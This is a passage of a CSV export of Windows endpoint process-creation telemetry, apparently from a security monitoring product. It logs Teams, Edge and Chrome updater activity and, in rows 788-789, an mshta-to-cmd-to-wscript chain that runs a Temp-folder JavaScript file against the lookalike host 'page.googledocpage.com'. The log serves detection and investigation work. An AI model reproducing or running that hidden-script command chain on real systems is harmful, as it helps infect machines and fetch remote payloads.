""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 2",False,2021-06-24 00:52:42.683357400+00:00,12960,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:50.248028900+00:00,2021-06-24 00:53:50.866507900+00:00,4c451e05-5a84-4270-8bfe-99c13448a871,computerpii_0a470890c60768167990033d701e7bd881398861,168430,False,10.7740.19041.1052,False,11540474045175243,,11540474045175244,2021-06-24 00:52:50.216364400+00:00,19032,2021-06-24 00:52:50.216364400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19032,16512,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 00:52:23.836202300+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+788,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:50.347644800+00:00,2140,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 ",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:50.216364400+00:00,19032,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 2",False,2021-06-24 00:52:42.683357400+00:00,12960,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:50.391918500+00:00,2021-06-24 00:53:50.866733500+00:00,ef913922-ebb6-4de3-a59f-2f44d5591a38,computerpii_0a470890c60768167990033d701e7bd881398861,168434,False,10.7740.19041.1052,False,11540474045175243,,11540474045175245,2021-06-24 00:52:50.216364400+00:00,19032,2021-06-24 00:52:50.216364400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19032,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 00:52:23.836202300+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+789,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:50.354957500+00:00,20276,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 2",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:50.216364400+00:00,19032,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 2",False,2021-06-24 00:52:42.683357400+00:00,12960,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:50.392381100+00:00,2021-06-24 00:53:50.866776800+00:00,e5651937-d31c-4907-9233-506aaca50c12,computerpii_0a470890c60768167990033d701e7bd881398861,168435,False,10.7740.19041.1052,False,11540474045175243,,11540474045175246,2021-06-24 00:52:50.216364400+00:00,19032,2021-06-24 00:52:50.216364400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19032,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 00:52:23.836202300+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+790,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:50.361770600+00:00,16472,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --no-sandbox --no-zygote --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\pluginhost\FilePII_362d0e2af8f9714023b734d6d78e953a406c079a.js"" --background-color=#fff --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1 --msteams-process-type=pluginHost",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:50.393288700+00:00,2021-06-24 00:53:50.866823500+00:00,26bfdac6-df07-4edc-a586-18044a039b44,computerpii_0a470890c60768167990033d701e7bd881398861,168436,False,10.7740.19041.1052,False,11540474045175219,,11540474045175247,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+791,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:51.865111300+00:00,19344,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --no-sandbox --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=4912 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:51.891789400+00:00,2021-06-24 00:53:50.867077300+00:00,78cf54d7-ee80-401e-8ac3-6e9941df43e9,computerpii_0a470890c60768167990033d701e7bd881398861,168441,False,10.7740.19041.1052,False,11540474045175219,,11540474045175248,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+792,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:51.947270400+00:00,4832,MicrosoftEdgeUpdate.exe,"""MicrosoftEdgeUpdate.exe"" /svc",PortableExecutable,2020-09-27 14:36:21.069830800+00:00,C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe,213392,b55ad19c6c110e9bf985bc8674f7bcb3,9991ba022173f283ee99068b708f60ac5143fe0c81c9e3673cc7835b108a4f44,accd3e9360bb920985f1a42ee00eda43cf6405e9,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:51.973033900+00:00,2021-06-24 00:53:50.867113800+00:00,82d28c16-f629-420e-a157-13badce03113,computerpii_0a470890c60768167990033d701e7bd881398861,168442,False,10.7740.19041.1052,False,11540474045136906,,11540474045175249,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft Edge Update,1.3.133.5,Microsoft Edge Update,msedgeupdate.dll,Microsoft Edge Update
+793,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:58.982379100+00:00,2021-06-24 00:53:50.868699600+00:00,fff30293-fabe-46ae-b510-81a0eee8c7ae,computerpii_0a470890c60768167990033d701e7bd881398861,168478,False,10.7740.19041.1052,False,11540474045136906,,11540474045175255,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+794,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:01.408782500+00:00,5968,91.0.4472.114_91.0.4472.106_chrome_updater.exe,"""91.0.4472.114_91.0.4472.106_chrome_updater.exe"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",PortableExecutable,2021-06-24 00:53:01.351052+00:00,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\91.0.4472.114_91.0.4472.106_chrome_updater.exe,2700728,98679b7d577c6c07c5709d0ad2a404c9,f8de85d2cc41a88128a4a25e1d3ede844566839b02e40ef431e21723376e4d61,229dca5ba8a3a9afed11da1f0f1ed38b39645126,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,"""GoogleUpdate.exe"" /svc",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:01.510794800+00:00,2021-06-24 00:53:50.869380300+00:00,fbeedb4a-912b-4938-beeb-b04804402756,computerpii_0a470890c60768167990033d701e7bd881398861,168496,False,10.7740.19041.1052,False,11540474045175255,,11540474045175256,2021-06-24 00:52:58.966146700+00:00,18404,2021-06-24 00:52:58.966146700+00:00,GoogleUpdate.exe,18404,256,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update,155592,2020-10-01 00:29:47+00:00,2020-11-11 01:43:44.395967800+00:00,2021-06-24 00:52:58.956026600+00:00,2020-11-11 01:43:46.330605500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer,Google LLC,Google Chrome Installer,91.0.4472.114,mini_installer,,Google Chrome Installer
+795,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:01.526578300+00:00,8276,setup.exe,"""setup.exe"" --update-setup-exe=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\SETUP_PATCH.PACKED.7Z"" --new-setup-exe=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\setup.exe"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",PortableExecutable,2021-06-17 06:27:59.501500100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.106\Installer\setup.exe,2727592,e3d0c763e6d3c0e68429cdfcf95a789b,0fd5ec39c8c9a273728c633b5b509defa4a24136e31c9c3d74f4b26097b6fb12,e752a9f798591f69c3b2aa497cb95280df662f39,98679b7d577c6c07c5709d0ad2a404c9,f8de85d2cc41a88128a4a25e1d3ede844566839b02e40ef431e21723376e4d61,229dca5ba8a3a9afed11da1f0f1ed38b39645126,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:53:01.408782500+00:00,5968,91.0.4472.114_91.0.4472.106_chrome_updater.exe,"""91.0.4472.114_91.0.4472.106_chrome_updater.exe"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",True,2021-06-24 00:52:58.966146700+00:00,18404,GoogleUpdate.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:01.589625700+00:00,2021-06-24 00:53:50.869830200+00:00,099b1911-07dd-4c55-b8a8-61a0e19350c0,computerpii_0a470890c60768167990033d701e7bd881398861,168504,False,10.7740.19041.1052,False,11540474045175256,,11540474045175257,2021-06-24 00:53:01.408782500+00:00,5968,2021-06-24 00:53:01.408782500+00:00,91.0.4472.114_91.0.4472.106_chrome_updater.exe,5968,16640,ActiveProcessStartkey,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9},2700728,2021-06-17 00:09:08+00:00,2021-06-24 00:53:00.775497900+00:00,2021-06-24 00:53:01.430063400+00:00,2021-06-24 00:53:01.351052+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.114,mini_installer,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.106,setup,,Google Chrome Installer
+796,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:01.557194900+00:00,13868,setup.exe,"""setup.exe"" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=91.0.4472.106 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6914bef20,0x7ff6914bef30,0x7ff6914bef40",PortableExecutable,2021-06-17 06:27:59.501500100+00:00,C:\Program Files\Google\Chrome\Application\91.0.4472.106\Installer\setup.exe,2727592,e3d0c763e6d3c0e68429cdfcf95a789b,0fd5ec39c8c9a273728c633b5b509defa4a24136e31c9c3d74f4b26097b6fb12,e752a9f798591f69c3b2aa497cb95280df662f39,e3d0c763e6d3c0e68429cdfcf95a789b,0fd5ec39c8c9a273728c633b5b509defa4a24136e31c9c3d74f4b26097b6fb12,e752a9f798591f69c3b2aa497cb95280df662f39,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:53:01.526578300+00:00,8276,setup.exe,"""setup.exe"" --update-setup-exe=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\SETUP_PATCH.PACKED.7Z"" --new-setup-exe=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\setup.exe"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",True,2021-06-24 00:53:01.408782500+00:00,5968,91.0.4472.114_91.0.4472.106_chrome_updater.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:01.590688300+00:00,2021-06-24 00:53:50.869889100+00:00,3dd6c2e2-398c-4cb4-8ec1-28aff32f61ea,computerpii_0a470890c60768167990033d701e7bd881398861,168505,False,10.7740.19041.1052,False,11540474045175257,,11540474045175258,2021-06-24 00:53:01.526578300+00:00,8276,2021-06-24 00:53:01.526578300+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\91.0.4472.106\Installer\setup.exe,8276,16512,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application\91.0.4472.106\Installer,2727592,2021-06-11 00:10:25+00:00,2021-06-17 06:27:37.012455+00:00,2021-06-24 00:53:01.564051500+00:00,2021-06-17 06:27:59.501500100+00:00,16640,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,256.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome Installer,91.0.4472.106,setup,,Google Chrome Installer,Google LLC,Google Chrome Installer,91.0.4472.106,setup,,Google Chrome Installer
+797,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:01.729062300+00:00,2040,setup.exe,"""setup.exe"" --install-archive=""C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\CHROME_PATCH.PACKED.7Z"" --previous-version=""91.0.4472.106"" --verbose-logging --do-not-launch-chrome --channel=stable --system-level",PortableExecutable,2021-06-24 00:53:01.601809800+00:00,C:\Program Files (x86)\Google\Update\Install\{4B8047EF-0509-4003-AAAB-3590B2C399D9}\FilePII_d4bd33bd6f3176b4dcfa32e406e4c0881d6aa1d0.tmp\setup.exe,2727592,7b1d631364afe53b8472ed5fcef7c7fa,7e7e36e8a12e76d11b50f90313d5a0a1fc8bac75bf5b56c8e57bd9a0c822dc4d,5c4860da314435fa3067b1404a7a7364e09022d5,98679b7d577c6c07c5709d0ad2a404c9,f8de85d2cc41a88128a4a25e1d3ede844566839b02e40ef431e21723376e4d61,229dca5ba8a3a9afed11da1f0f1ed38b39645126,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 